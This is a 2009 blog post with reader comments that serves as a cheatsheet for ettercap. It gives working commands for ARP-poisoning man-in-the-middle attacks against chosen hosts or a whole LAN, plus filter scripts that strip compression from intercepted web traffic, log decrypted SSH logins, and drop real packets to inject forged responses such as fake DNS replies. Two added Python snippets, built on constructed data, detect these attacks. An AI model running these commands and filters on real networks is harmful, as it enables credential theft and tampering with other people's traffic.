Wednesday, November 25, 2009

More On Ettercap plus Filter examples

This post is a follow-up to my previous post on using an ettercap filter to change some text on the fly throughout an MSN conversation. Finding information on Google about ettercap filters wasn't as easy as I would have anticipated; it took me several minutes to find usable info. Below is a summary of my findings, mainly intended as a reference or cheatsheet, if you will, for some of its popular uses.

Just to recap, if you haven't done your homework on the basics of ettercap yet:

Basic Sniffing

Network sniffing in quiet text mode with no ARP poisoning or ARP scan. Ettercap listens on the eth0 interface and displays only information of interest, such as passwords.

ettercap -Tzq -i eth0

To sniff traffic between 2 hosts:

ettercap -i eth0 -Tq -M ARP:remote /victim_ip_A/ /victim_ip_B/

'-i':
The interface to listen on.
'-Tq':
Run in quiet text mode.
'-M ARP:remote':
Perform a man-in-the-middle (MITM) ARP spoof between two points or nodes in the network; in the example above, between /victim_ip_A/ and /victim_ip_B/.

Sniff multiple hosts by sitting in the middle between the network nodes and the gateway:

ettercap -i eth0 -T -M arp /192.168.1.1/ /192.168.1.10-20/

Capture traffic on a certain port only:

ettercap -i eth0 -T -M arp /192.168.1.1/ /192.168.1.10-20/23


To sniff traffic between all hosts on the network:

ettercap -T -M arp // //

Note that the above is generally not recommended. Doing so degrades network performance, since your network card is not powerful enough to process all of the network traffic (assuming this is a reasonably sized network). A network like this would suffer from packet loss and congestion, since there would be a lot of retransmissions.
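The ARP runs above leave a measurable trace on the LAN: the attacking host's MAC starts answering for the gateway and for every poisoned victim. As an added example (not code from this post or from the ettercap project), here is a small Python check over constructed ARP reply records that flags the two symptoms a defender watches for: an IP whose MAC changes, and one MAC claiming several IPs. All addresses below are made up sample data.

```python
"""Offline ARP-spoofing indicator check (added example, constructed data)."""
from collections import defaultdict

# Constructed (sender_ip, sender_mac) pairs, as seen in unsolicited ARP replies.
# The first three are the legitimate mappings; the last three mimic what an
# "-M arp /gateway/ /hosts/" run produces: one new MAC claiming everybody.
SAMPLE_ARP_REPLIES = [
    ("192.168.1.1",  "00:11:22:33:44:01"),   # real gateway, seen first
    ("192.168.1.10", "00:11:22:33:44:0a"),
    ("192.168.1.11", "00:11:22:33:44:0b"),
    ("192.168.1.1",  "de:ad:be:ef:00:01"),   # gateway now answered by another MAC
    ("192.168.1.10", "de:ad:be:ef:00:01"),   # same MAC also claims a host
    ("192.168.1.11", "de:ad:be:ef:00:01"),
]


def arp_anomalies(replies, gateway_ip="192.168.1.1"):
    """Return (severity, description) findings for IP->MAC changes and
    MACs that claim more than one IP. A gateway change is rated HIGH.
    Caveat: VRRP/HSRP routers or multi-homed hosts legitimately map several
    IPs to one MAC, so whitelist those before alerting in production."""
    first_mac = {}
    ips_by_mac = defaultdict(set)
    findings = []
    for ip, mac in replies:
        mac = mac.lower()
        ips_by_mac[mac].add(ip)
        if ip not in first_mac:
            first_mac[ip] = mac
        elif first_mac[ip] != mac:
            sev = "HIGH" if ip == gateway_ip else "MEDIUM"
            findings.append((sev, f"{ip} changed from {first_mac[ip]} to {mac}"))
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            findings.append(("HIGH", f"{mac} claims {len(ips)} IPs: {sorted(ips)}"))
    return findings


if __name__ == "__main__":
    for severity, text in arp_anomalies(SAMPLE_ARP_REPLIES):
        print(severity, text)
```

On a real network the same records come from a passive ARP sniffer or from periodic `arp -a` snapshots; the logic is the same.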

Ettercap is capable of:
• sniffing HTTPS
• Collecting passwords for TELNET, FTP, POP, RLOGIN, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, HALF LIFE, QUAKE 3, MSN, YMSG
• Injecting traffic
• OS fingerprinting

Logging The Output

ettercap -Tq -L filename -M ARP:remote /ip_address_A/ /ip_address_B/

Other useful options:
-F: use preconfigured or custom filters
-P: use a plugin (to view the available plugins, run ettercap -TQ and press p to open the plugin menu)
-c: compress the output (gzip)

More on Ettercap Filters:
Monitoring web traffic (port 80):
Note: When you monitor web traffic, the packets you see may arrive in an encoded (compressed) form. Ettercap needs plain-text traffic in order to filter it effectively. From my observations, the encoding web pages use is advertised by the client in the request header "Accept-Encoding: gzip, deflate" (I'm not sure of, or aware of, any others).

Below is a filter that zaps the encoding to force plain-text communication. The replacement strings are the same length as the words they overwrite, so the TCP payload length does not change:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "gzip")) {
      replace("gzip", "    "); # note: four spaces in the replacement string
      msg("whited out gzip\n");
   }
}

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "deflate")) {
      replace("deflate", "       "); # note: seven spaces in the replacement string
      msg("whited out deflate\n");
   }
}
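The whiteout filter above is easy to spot from the server or proxy side, because it leaves a blank Accept-Encoding value that no real browser ever sends. As an added example (not from this post or from ettercap), here is a Python check over a constructed request and the same request after the filter has run; the sample host name is made up.

```python
"""Detect the trace left by the gzip/deflate whiteout filter (added example)."""
import re

# Constructed sample request, and the same request after the filter replaced
# "gzip" with four spaces and "deflate" with seven, exactly as the filter does.
CLEAN_REQUEST = (
    "GET / HTTP/1.1\r\nHost: example.test\r\n"
    "Accept-Encoding: gzip, deflate\r\n\r\n"
)
FILTERED_REQUEST = CLEAN_REQUEST.replace("gzip", " " * 4).replace("deflate", " " * 7)


def accept_encoding_tampered(request):
    """Return (tampered, reason) for one HTTP request head given as a str."""
    head = request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() != "accept-encoding":
            continue
        tokens = [t.strip() for t in value.split(",")]
        if all(t == "" for t in tokens):
            return True, "Accept-Encoding present but every token is blank"
        if any(t == "" for t in tokens):
            return True, "Accept-Encoding has an empty token"
        if re.match(r" {2,}", value):            # real clients emit one space
            return True, "Accept-Encoding value padded with spaces"
        return False, "ok"
    return False, "no Accept-Encoding header"


if __name__ == "__main__":
    for req in (CLEAN_REQUEST, FILTERED_REQUEST):
        print(accept_encoding_tampered(req))
```

A web server log that suddenly shows uncompressed responses to clients which normally accept gzip is the same signal seen from the other end.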

Replacing text in a packet:
if (ip.proto == TCP && search(DATA.data, "lol")) {
   replace("lol", "smh");
   msg("filter ran");
}

Display a message if the TCP port is 22:
if (ip.proto == TCP) {
   if (tcp.src == 22 || tcp.dst == 22) {
      msg("SSH packet\n");
   }
}

Log all telnet traffic, and also execute ./program on every packet:
if (ip.proto == TCP) {
   if (tcp.src == 23 || tcp.dst == 23) {
      log(DATA.data, "./logfile.log");
      exec("./program");
   }
}

Log all traffic except HTTP:
if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) {
   log(DATA.data, "./logfile.log");
}

Some operations on the payload of the packet:
if ( DATA.data + 20 == 0x4142 ) {
   DATA.data + 20 = 0x4243;
} else {
   DATA.data = "modified";
   DATA.data + 20 = 0x4445;
}

Drop any packet containing "ettercap":
if (search(DECODED.data, "ettercap")) {
   msg("some one is talking about us...\n");
   drop();
   kill();
}

Log SSH decrypted packets matching the regexp:
if (ip.proto == TCP) {
   if (tcp.src == 22 || tcp.dst == 22) {
      if (regex(DECODED.data, ".*login.*")) {
         log(DECODED.data, "./decrypted_log");
      }
   }
}

Dying packets (the TTL threshold was lost to the blog's HTML; 5 is the value used in ettercap's own etter.filter.examples):
if (ip.ttl < 5) {
   msg("The packet will die soon\n");
}

String comparison at a given offset:
if (DATA.data + 40 == "ette") {
   log(DATA.data, "./logfile");
}

Inject a file after a specific packet:
if (tcp.src == 21 && search(DATA.data, "root")) {
   inject("./fake_response");
}

Replace the entire packet with another:
if (tcp.src == 23 && search(DATA.data, "microsoft")) {
   drop();
   inject("./fake_telnet");
}

Filter only a specific IP address:
if (ip.src == '192.168.0.2') {
   drop();
}

Translate the port of the TCP packet from 80 to 81:
if (tcp.dst == 80) {
   tcp.dst -= 1;
   tcp.dst += 2;
}

Resources/Good reading:
http://ettercap.sourceforge.net/
http://synjunkie.blogspot.com/2007/10/arp-poisoning.html
http://openmaniak.com/ettercap_filter.php
http://forums.remote-exploit.org/backtrack-v2-0-final/7681-ettercap-filters-2.html
http://www.irongeek.com/i.php?page=security/ettercapfilter

12 comments:

  1. Great post, very useful for making my own filter ;) Thank you

  2. Thank you for visiting... Always happy to help

  3. Thanks for the awesome post. Sadly most of those 'good reading' links are no longer available. Do you have any other resources you would like to share regarding Ettercap filters?

  4. I just checked all the links and they are working fine for me. Please try again. Copy the links if you are unable to click on them.

  5. Hi,

    I tried "Replace the entire packet with another". Actually, the other packet (the fake packet) is being appended to another packet (which is not supposed to happen).
    The contents are not being replaced; they are appended to the other packet.

    Are there any functions for replacing files in ettercap?

    Steps I followed:
    created my fake packet
    using a filter, dropped the packet

    Can you suggest how to go about this?

    1. I have not done this in a while, but when I get a chance I will try this in a virtual lab. Once a packet gets dropped, you can inject your own response. For example, a DNS request gets sent to a server. When the response comes back you can drop that legitimate response, then inject your own fake DNS response. Just an overview of how it's intended to be used.

  6. Steps I followed:
    - created my fake packet
    - using a filter, dropped the packet
    - using the inject function, injected my fake packet

    1. Hey, I am also trying to do the same thing as you i.e. replace the packet by another one. But, I don't know how to create a fake packet. Will you please help me in creating a fake packet? Can you post one example of the same?

  8. This example is not clear.

    Some operation on the payload of the packet:
    if ( DATA.data + 20 == 0x4142 ) {

    I can't tell if the pointer is in bytes, words, or what. Please clarify. It would be nice to compare it to an actual DATA.data field from a Wireshark capture. Thank you.
